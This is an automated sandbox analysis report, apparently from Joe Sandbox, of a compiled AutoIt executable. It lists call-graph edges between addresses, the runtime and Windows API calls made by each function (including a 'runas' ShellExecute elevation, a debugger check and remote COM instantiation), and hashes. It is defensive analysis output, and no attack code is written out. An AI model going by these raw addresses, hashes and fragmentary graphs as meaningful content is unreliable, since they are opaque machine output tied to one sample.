_fseek 88532->88540 88558 41443c 88533->88558 88536 4150b9 88571 41e1f4 88536->88571 88538->88513 88539->88519 88540->88519 88542 414e61 88541->88542 88543 414e79 88541->88543 88597 417f77 46 API calls __getptd_noexit 88542->88597 88544 414139 __flsbuf 46 API calls 88543->88544 88546 414e80 88544->88546 88549 41e1f4 __write 51 API calls 88546->88549 88547 414e66 88598 417f25 10 API calls __write_nolock 88547->88598 88550 414e97 88549->88550 88551 414f09 88550->88551 88553 414ec9 88550->88553 88557 414e71 88550->88557 88599 417f77 46 API calls __getptd_noexit 88551->88599 88554 41e1f4 __write 51 API calls 88553->88554 88553->88557 88555 414f64 88554->88555 88556 41e1f4 __write 51 API calls 88555->88556 88555->88557 88556->88557 88557->88533 88559 414455 88558->88559 88563 414477 88558->88563 88560 414139 __flsbuf 46 API calls 88559->88560 88559->88563 88561 414470 88560->88561 88600 41b7b2 77 API calls 4 library calls 88561->88600 88564 414139 88563->88564 88565 414145 88564->88565 88566 41415a 88564->88566 88601 417f77 46 API calls __getptd_noexit 88565->88601 88566->88536 88568 41414a 88602 417f25 10 API calls __write_nolock 88568->88602 88570 414155 88570->88536 88572 41e200 __lseeki64 88571->88572 88573 41e223 88572->88573 88574 41e208 88572->88574 88576 41e22f 88573->88576 88579 41e269 88573->88579 88623 417f8a 46 API calls __getptd_noexit 88574->88623 88625 417f8a 46 API calls __getptd_noexit 88576->88625 88577 41e20d 88624 417f77 46 API calls __getptd_noexit 88577->88624 88603 41ae56 88579->88603 88581 41e234 88626 417f77 46 API calls __getptd_noexit 88581->88626 88584 41e26f 88586 41e291 88584->88586 88587 41e27d 88584->88587 88585 41e23c 88627 417f25 10 API calls __write_nolock 88585->88627 88628 417f77 46 API calls __getptd_noexit 88586->88628 88613 41e17f 88587->88613 88591 41e215 __lseeki64 88591->88532 88592 41e289 88630 41e2c0 LeaveCriticalSection __unlock_fhandle 88592->88630 88593 41e296 88629 417f8a 46 API calls __getptd_noexit 88593->88629 88596->88532 88597->88547 88598->88557 88599->88557 88600->88563 88601->88568 88602->88570 88604 41ae62 __lseeki64 88603->88604 88605 41aebc 88604->88605 88606 4182cb __lock 46 API calls 88604->88606 88607 41aec1 EnterCriticalSection 88605->88607 88608 41aede __lseeki64 88605->88608 88609 41ae8e 88606->88609 88607->88608 88608->88584 88610 41aeaa 88609->88610 88611 41ae97 InitializeCriticalSectionAndSpinCount 88609->88611 88612 41aeec ___lock_fhandle LeaveCriticalSection 88610->88612 88611->88610 88612->88605 88614 41aded __chsize_nolock 46 API calls 88613->88614 88615 41e18e 88614->88615 88616 41e1a4 SetFilePointer 88615->88616 88617 41e194 88615->88617 88619 41e1c3 88616->88619 88620 41e1bb GetLastError 88616->88620 88618 417f77 __write_nolock 46 API calls 88617->88618 88621 41e199 88618->88621 88619->88621 88622 417f9d __dosmaperr 46 API calls 88619->88622 88620->88619 88621->88592 88622->88621 88623->88577 88624->88591 88625->88581 88626->88585 88627->88591 88628->88593 88629->88592 88630->88591 88632 4149ea 88631->88632 88633 4149fe 88631->88633 88677 417f77 46 API calls __getptd_noexit 88632->88677 88636 41443c __flush 77 API calls 88633->88636 88645 4149fa 88633->88645 88635 4149ef 88678 417f25 10 API calls __write_nolock 88635->88678 88637 414a0a 88636->88637 88650 41d8c2 88637->88650 88641 414139 __flsbuf 46 API calls 88642 414a18 88641->88642 88654 41d7fe 88642->88654 88644 414a1e 88644->88645 88646 413748 _free 46 API calls 88644->88646 88649 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 88645->88649 88646->88645 88647->88378 88648->88383 88649->88383 88651 414a12 88650->88651 88652 41d8d2 88650->88652 88651->88641 88652->88651 88653 413748 _free 46 API calls 88652->88653 88653->88651 88655 41d80a __lseeki64 88654->88655 88656 41d812 88655->88656 88657 41d82d 88655->88657 88694 417f8a 46 API calls __getptd_noexit 88656->88694 88659 41d839 88657->88659 88663 41d873 88657->88663 88696 417f8a 46 API calls __getptd_noexit 88659->88696 88661 41d817 88695 417f77 46 API calls __getptd_noexit 88661->88695 88662 41d83e 88697 417f77 46 API calls __getptd_noexit 88662->88697 88666 41ae56 ___lock_fhandle 48 API calls 88663->88666 88669 41d879 88666->88669 88667 41d81f __lseeki64 88667->88644 88668 41d846 88698 417f25 10 API calls __write_nolock 88668->88698 88671 41d893 88669->88671 88672 41d887 88669->88672 88699 417f77 46 API calls __getptd_noexit 88671->88699 88679 41d762 88672->88679 88675 41d88d 88700 41d8ba LeaveCriticalSection __unlock_fhandle 88675->88700 88677->88635 88678->88645 88701 41aded 88679->88701 88681 41d7c8 88714 41ad67 47 API calls __write_nolock 88681->88714 88683 41d772 88683->88681 88684 41d7a6 88683->88684 88686 41aded __chsize_nolock 46 API calls 88683->88686 88684->88681 88687 41aded __chsize_nolock 46 API calls 88684->88687 88685 41d7d0 88688 41d7f2 88685->88688 88715 417f9d 46 API calls 2 library calls 88685->88715 88689 41d79d 88686->88689 88690 41d7b2 CloseHandle 88687->88690 88688->88675 88692 41aded __chsize_nolock 46 API calls 88689->88692 88690->88681 88693 41d7be GetLastError 88690->88693 88692->88684 88693->88681 88694->88661 88695->88667 88696->88662 88697->88668 88698->88667 88699->88675 88700->88667 88702 41adfa 88701->88702 88705 41ae12 88701->88705 88703 417f8a __write_nolock 46 API calls 88702->88703 88704 41adff 88703->88704 88708 417f77 __write_nolock 46 API calls 88704->88708 88706 417f8a __write_nolock 46 API calls 88705->88706 88707 41ae51 88705->88707 88709 41ae23 88706->88709 88707->88683 88710 41ae07 88708->88710 88711 417f77 __write_nolock 46 API calls 88709->88711 88710->88683 88712 41ae2b 88711->88712 88713 417f25 __write_nolock 10 API calls 88712->88713 88713->88710 88714->88685 88715->88688 88717 414c82 __lseeki64 88716->88717 88718 414cc3 88717->88718 88719 414c96 __setmbcp_nolock 88717->88719 88728 414cbb __lseeki64 88717->88728 88720 415471 __lock_file 47 API calls 88718->88720 88743 417f77 46 API calls __getptd_noexit 88719->88743 88722 414ccb 88720->88722 88729 414aba 88722->88729 88723 414cb0 88744 417f25 10 API calls __write_nolock 88723->88744 88728->88387 88733 414ad8 __setmbcp_nolock 88729->88733 88735 414af2 88729->88735 88730 414ae2 88796 417f77 46 API calls __getptd_noexit 88730->88796 88732 414ae7 88797 417f25 10 API calls __write_nolock 88732->88797 88733->88730 88733->88735 88740 414b2d 88733->88740 88745 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 88735->88745 88737 414c38 __setmbcp_nolock 88799 417f77 46 API calls __getptd_noexit 88737->88799 88738 414139 __flsbuf 46 API calls 88738->88740 88740->88735 88740->88737 88740->88738 88746 41dfcc 88740->88746 88776 41d8f3 88740->88776 88798 41e0c2 46 API calls 3 library calls 88740->88798 88743->88723 88744->88728 88745->88728 88747 41dfd8 __lseeki64 88746->88747 88748 41dfe0 88747->88748 88749 41dffb 88747->88749 88869 417f8a 46 API calls __getptd_noexit 88748->88869 88750 41e007 88749->88750 88756 41e041 88749->88756 88871 417f8a 46 API calls __getptd_noexit 88750->88871 88753 41dfe5 88870 417f77 46 API calls __getptd_noexit 88753->88870 88755 41e00c 88872 417f77 46 API calls __getptd_noexit 88755->88872 88758 41e063 88756->88758 88759 41e04e 88756->88759 88761 41ae56 ___lock_fhandle 48 API calls 88758->88761 88874 417f8a 46 API calls __getptd_noexit 88759->88874 88764 41e069 88761->88764 88762 41e014 88873 417f25 10 API calls __write_nolock 88762->88873 88763 41e053 88875 417f77 46 API calls __getptd_noexit 88763->88875 88766 41e077 88764->88766 88767 41e08b 88764->88767 88800 41da15 88766->88800 88876 417f77 46 API calls __getptd_noexit 88767->88876 88771 41e083 88878 41e0ba LeaveCriticalSection __unlock_fhandle 88771->88878 88772 41e090 88877 417f8a 46 API calls __getptd_noexit 88772->88877 88775 41dfed __lseeki64 88775->88740 88777 41d900 88776->88777 88780 41d915 88776->88780 88882 417f77 46 API calls __getptd_noexit 88777->88882 88779 41d905 88883 417f25 10 API calls __write_nolock 88779->88883 88783 41d94a 88780->88783 88790 41d910 88780->88790 88879 420603 88780->88879 88784 414139 __flsbuf 46 API calls 88783->88784 88785 41d95e 88784->88785 88786 41dfcc __read 59 API calls 88785->88786 88787 41d965 88786->88787 88788 414139 __flsbuf 46 API calls 88787->88788 88787->88790 88789 41d988 88788->88789 88789->88790 88791 414139 __flsbuf 46 API calls 88789->88791 88790->88740 88792 41d994 88791->88792 88792->88790 88793 414139 __flsbuf 46 API calls 88792->88793 88794 41d9a1 88793->88794 88795 414139 __flsbuf 46 API calls 88794->88795 88795->88790 88796->88732 88797->88735 88798->88740 88799->88732 88801 41da31 88800->88801 88802 41da4c 88800->88802 88804 417f8a __write_nolock 46 API calls 88801->88804 88803 41da5b 88802->88803 88805 41da7a 88802->88805 88806 417f8a __write_nolock 46 API calls 88803->88806 88807 41da36 88804->88807 88809 41da98 88805->88809 88820 41daac 88805->88820 88808 41da60 88806->88808 88810 417f77 __write_nolock 46 API calls 88807->88810 88811 417f77 __write_nolock 46 API calls 88808->88811 88812 417f8a __write_nolock 46 API calls 88809->88812 88821 41da3e 88810->88821 88814 41da67 88811->88814 88816 41da9d 88812->88816 88813 41db02 88815 417f8a __write_nolock 46 API calls 88813->88815 88817 417f25 __write_nolock 10 API calls 88814->88817 88818 41db07 88815->88818 88819 417f77 __write_nolock 46 API calls 88816->88819 88817->88821 88822 417f77 __write_nolock 46 API calls 88818->88822 88823 41daa4 88819->88823 88820->88813 88820->88821 88824 41dae1 88820->88824 88826 41db1b 88820->88826 88821->88771 88822->88823 88827 417f25 __write_nolock 10 API calls 88823->88827 88824->88813 88825 41daec ReadFile 88824->88825 88831 41dc17 88825->88831 88832 41df8f GetLastError 88825->88832 88828 416b04 __malloc_crt 46 API calls 88826->88828 88827->88821 88830 41db31 88828->88830 88835 41db59 88830->88835 88836 41db3b 88830->88836 88831->88832 88839 41dc2b 88831->88839 88833 41de16 88832->88833 88834 41df9c 88832->88834 88843 417f9d __dosmaperr 46 API calls 88833->88843 88864 41dd9b 88833->88864 88837 417f77 __write_nolock 46 API calls 88834->88837 88840 420494 __lseeki64_nolock 48 API calls 88835->88840 88838 417f77 __write_nolock 46 API calls 88836->88838 88841 41dfa1 88837->88841 88842 41db40 88838->88842 88854 41dc47 88839->88854 88855 41de5b 88839->88855 88839->88864 88844 41db67 88840->88844 88845 417f8a __write_nolock 46 API calls 88841->88845 88846 417f8a __write_nolock 46 API calls 88842->88846 88843->88864 88844->88825 88845->88864 88846->88821 88847 413748 _free 46 API calls 88847->88821 88848 41dcab ReadFile 88851 41dcc9 GetLastError 88848->88851 88859 41dcd3 88848->88859 88849 41ded0 ReadFile 88852 41deef GetLastError 88849->88852 88860 41def9 88849->88860 88850 41ddec MultiByteToWideChar 88853 41de10 GetLastError 88850->88853 88850->88864 88851->88854 88851->88859 88852->88855 88852->88860 88853->88833 88854->88848 88856 41dd28 88854->88856 88855->88849 88855->88864 88857 41dda3 88856->88857 88858 41dd96 88856->88858 88856->88864 88865 41dd60 88856->88865 88857->88865 88866 41ddda 88857->88866 88861 417f77 __write_nolock 46 API calls 88858->88861 88859->88854 88862 420494 __lseeki64_nolock 48 API calls 88859->88862 88860->88855 88863 420494 __lseeki64_nolock 48 API calls 88860->88863 88861->88864 88862->88859 88863->88860 88864->88821 88864->88847 88865->88850 88867 420494 __lseeki64_nolock 48 API calls 88866->88867 88868 41dde9 88867->88868 88868->88850 88869->88753 88870->88775 88871->88755 88872->88762 88873->88775 88874->88763 88875->88762 88876->88772 88877->88771 88878->88775 88880 416b04 __malloc_crt 46 API calls 88879->88880 88881 420618 88880->88881 88881->88783 88882->88779 88883->88790 88887 4148b3 GetSystemTimeAsFileTime __aulldiv 88884->88887 88886 442c6b 88886->88390 88887->88886 88888->88398 88889->88403 88890->88403 88896 45272f __tzset_nolock _wcscpy 88891->88896 88892 414d04 61 API calls __fread_nolock 88892->88896 88893 44afef GetSystemTimeAsFileTime 88893->88896 88894 4528a4 88894->88319 88894->88320 88895 4150d1 81 API calls _fseek 88895->88896 88896->88892 88896->88893 88896->88894 88896->88895 88898 44b1bc 88897->88898 88899 44b1ca 88897->88899 88900 4149c2 116 API calls 88898->88900 88901 44b1e1 88899->88901 88902 4149c2 116 API calls 88899->88902 88903 44b1d8 88899->88903 88900->88899 88966->88274 88967->88283 88969->88285 89068 42d154 89072 480a8d 89068->89072 89070 42d161 89071 480a8d 197 API calls 89070->89071 89071->89070 89073 480ae4 89072->89073 89074 480b26 89072->89074 89076 480aeb 89073->89076 89077 480b15 89073->89077 89075 40bc70 52 API calls 89074->89075 89092 480b2e 89075->89092 89079 480aee 89076->89079 89080 480b04 89076->89080 89105 4805bf 197 API calls 89077->89105 89079->89074 89082 480af3 89079->89082 89104 47fea2 197 API calls __itow_s 89080->89104 89103 47f135 197 API calls 89082->89103 89084 40e0a0 52 API calls 89084->89092 89086 408f40 VariantClear 89088 481156 89086->89088 89087 480aff 89087->89086 89089 408f40 VariantClear 89088->89089 89090 48115e 89089->89090 89090->89070 89091 40e710 53 API calls 89091->89092 89092->89084 89092->89087 89092->89091 89093 401980 53 API calls 89092->89093 89095 40c2c0 52 API calls 89092->89095 89096 408e80 VariantClear 89092->89096 89097 480ff5 89092->89097 89098 40a780 197 API calls 89092->89098 89106 45377f 52 API calls 89092->89106 89107 45e951 53 API calls 89092->89107 89108 40e830 53 API calls 89092->89108 89109 47925f 53 API calls 89092->89109 89110 47fcff 197 API calls 89092->89110 89093->89092 89095->89092 89096->89092 89111 45e737 90 API calls 3 library calls 89097->89111 89098->89092 89103->89087 89104->89087 89105->89087 89106->89092 89107->89092 89108->89092 89109->89092 89110->89092 89111->89087 89112 425b5e 89117 40c7f0 89112->89117 89116 425b6d 89152 40db10 52 API calls 89117->89152 89119 40c82a 89153 410ab0 6 API calls 89119->89153 89121 40c86d 89122 40bc70 52 API calls 89121->89122 89123 40c877 89122->89123 89124 40bc70 52 API calls 89123->89124 89125 40c881 89124->89125 89126 40bc70 52 API calls 89125->89126 89127 40c88b 89126->89127 89128 40bc70 52 API calls 89127->89128 89129 40c8d1 89128->89129 89130 40bc70 52 API calls 89129->89130 89131 40c991 89130->89131 89154 40d2c0 52 API calls 89131->89154 89133 40c99b 89155 40d0d0 53 API calls 89133->89155 89135 40c9c1 89136 40bc70 52 API calls 89135->89136 89137 40c9cb 89136->89137 89156 40e310 53 API calls 89137->89156 89139 40ca28 89140 408f40 VariantClear 89139->89140 89141 40ca30 89140->89141 89142 408f40 VariantClear 89141->89142 89143 40ca38 GetStdHandle 89142->89143 89144 429630 89143->89144 89145 40ca87 89143->89145 89144->89145 89146 429639 89144->89146 89151 41130a 51 API calls __cinit 89145->89151 89157 4432c0 57 API calls 89146->89157 89148 429641 89158 44b6ab CreateThread 89148->89158 89150 42964f CloseHandle 89150->89145 89151->89116 89152->89119 89153->89121 89154->89133 89155->89135 89156->89139 89157->89148 89158->89150 89159 44b5cb 58 API calls 89158->89159 89160 40b33c 89163 40ea70 89160->89163 89164 40ea89 89163->89164 89165 40cc70 197 API calls 89164->89165 89166 40ea9f 89165->89166 89167 40eaa7 89166->89167 89181 452670 VariantClear 89166->89181 89172 40eabe 89167->89172 89182 45e737 90 API calls 3 library calls 89167->89182 89170 42c1c8 89183 452670 VariantClear 89170->89183 89173 42c1e2 89172->89173 89180 40ceb0 53 API calls 89172->89180 89175 40eb2c 89176 408f40 VariantClear 89175->89176 89177 40eb34 89176->89177 89178 408f40 VariantClear 89177->89178 89179 40b347 89178->89179 89180->89175 89181->89167 89182->89170 89183->89172
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 004096C1
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                        • _memmove.LIBCMT ref: 0040970C
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                                        • _memmove.LIBCMT ref: 00409D96
                                                                                        • _memmove.LIBCMT ref: 0040A6C4
                                                                                        • _memmove.LIBCMT ref: 004297E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2383988440-0
                                                                                        • Opcode ID: 463cfb24b43e334c03d559853bc5e71839cf2126499b98d9667d8bf6107f1086
                                                                                        • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                                        • Opcode Fuzzy Hash: 463cfb24b43e334c03d559853bc5e71839cf2126499b98d9667d8bf6107f1086
                                                                                        • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                                          • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                                          • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                                          • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                                        • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                                          • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                                          • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                          • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                          • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                          • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                          • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                          • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                          • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                          • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                        Strings
                                                                                        • runas, xrefs: 0042E2AD, 0042E2DC
                                                                                        • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                        • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                        • API String ID: 2495805114-3383388033
                                                                                        • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                        • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                        • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                                        • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1515 46cb5f-46cbc3 call 40bc70 * 3 call 408f40 1524 46cbd4-46cbe7 CLSIDFromProgID 1515->1524 1525 46cbc5-46cbcd OleInitialize 1515->1525 1526 46cc33-46cc47 1524->1526 1527 46cbe9-46cbf9 CLSIDFromString 1524->1527 1525->1524 1528 46cca6-46ccba call 458651 1526->1528 1529 46cc49-46cc60 CoCreateInstance 1526->1529 1527->1526 1530 46cbfb-46cc05 1527->1530 1533 46cc96-46cca1 1528->1533 1539 46ccbc-46ccf7 CoInitializeSecurity call 412f40 call 4311fc 1528->1539 1529->1533 1534 46cc62-46cc8b call 43119b 1529->1534 1531 46cc06-46cc30 call 451b42 call 402250 * 3 1530->1531 1533->1531 1548 46cc8e-46cc90 1534->1548 1553 46cdf4 1539->1553 1554 46ccfd-46cd1f call 402160 call 431a2b 1539->1554 1548->1533 1551 46ceb7-46cef0 call 468070 call 402250 * 3 1548->1551 1555 46cdfa-46ce4a call 412f40 CoCreateInstanceEx CoTaskMemFree 1553->1555 1567 46cd35-46cd47 call 465177 1554->1567 1568 46cd21-46cd33 1554->1568 1555->1533 1565 46ce50-46ce55 1555->1565 1565->1533 1570 46ce5b-46ce62 1565->1570 1583 46cd4a-46cda3 call 40e0a0 call 402250 call 46150f call 40e0a0 call 402250 1567->1583 1571 46cda5-46cdaa 1568->1571 1574 46ce64-46ce8b CoSetProxyBlanket 1570->1574 1575 46ce8d-46ce9e 1570->1575 1579 46cdac-46cdbb call 4111c1 1571->1579 1580 46cdbd-46cdc0 1571->1580 1574->1575 1575->1548 1578 46cea4-46ceb2 1575->1578 1578->1531 1582 46cdc3-46cdf2 1579->1582 1580->1582 1582->1555 1583->1571
                                                                                        APIs
                                                                                        • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                        • CLSIDFromProgID.COMBASE(?,?), ref: 0046CBDF
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                        • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                        • _wcslen.LIBCMT ref: 0046CDB0
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                        • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                        • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                          • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                          • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                          • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 440038798-2785691316
                                                                                        • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                        • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                        • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                        • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2003 427693-427696 1997->2003 2004 427688-427691 1997->2004 2002 4276b4-4276be 1998->2002 2005 427625-427629 1999->2005 2006 40e59c-40e59f 1999->2006 2015 40e5ec-40e60c 2000->2015 2016 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2016 2017 4276c6-4276ca GetSystemInfo 2002->2017 2003->2002 2012 427698-4276a8 2003->2012 2004->2002 2008 427636-427640 2005->2008 2009 42762b-427631 2005->2009 2010 40e5a5-40e5ae 2006->2010 2011 427654-427657 2006->2011 2008->2000 2009->2000 2019 40e5b4 2010->2019 2020 427645-42764f 2010->2020 2011->2000 2018 42765d-42766f 2011->2018 2013 4276b0 2012->2013 2014 4276aa-4276ae 2012->2014 2013->2002 2014->2002 2022 40e612-40e623 call 40efd0 2015->2022 2023 4276d5-4276df GetSystemInfo 2015->2023 2016->2015 2029 40e5e8 2016->2029 2017->2023 2018->2000 2019->2000 2020->2000 2022->2017 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2029->2015 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
